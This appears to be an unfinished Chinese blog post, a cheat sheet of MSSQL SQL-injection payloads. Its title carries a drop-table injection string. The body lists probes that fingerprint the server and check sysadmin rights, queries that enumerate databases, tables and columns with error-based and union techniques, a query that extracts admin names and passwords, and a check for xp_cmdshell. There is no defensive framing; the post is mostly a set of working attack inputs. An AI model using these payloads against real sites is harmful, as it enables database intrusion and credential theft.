mssql从入门到';drop table --

未完待续 –2017-02-26

判断是否MSSQL

and exists (select * from sysobjects)

**MSSQL版

and 1=(select @@VERSION)

当前数据库名

and 1=(select db_name())

本地服务名

and 1=(select @@servername)

判断是否系统管理员

and 1=(select IS_SRVROLEMEMBER('sysadmin'))

判断是否是库权限

and 1=(Select IS_MEMBER('db_owner'))

库名

select name from master.dbo.sysdatabases where dbid=1,2,3

表名

select top 1 name from (select top 1 id,name from sysobjects where xtype=char(85) order by id asc) T order by id desc

列名

select * from tablename where id = 1 having 1=1
select * from tablename where id = 1 group by id having 1=1
select * from tablename where id = 1 group by id,name having 1=1
/*查看列数
union select null
union select null,null
union select null,null,null
*/
select top 1 col_name(object_id('tablename'),1)from sysobjects
select top 1 col_name(object_id('tablename'),2)from sysobjects
select top 1 col_name(object_id('tablename'),3)from sysobjects

查找内容

select id,name,pass from admin



存储过程

判断是否存在xp_cmdshell

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_cmdshell')

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值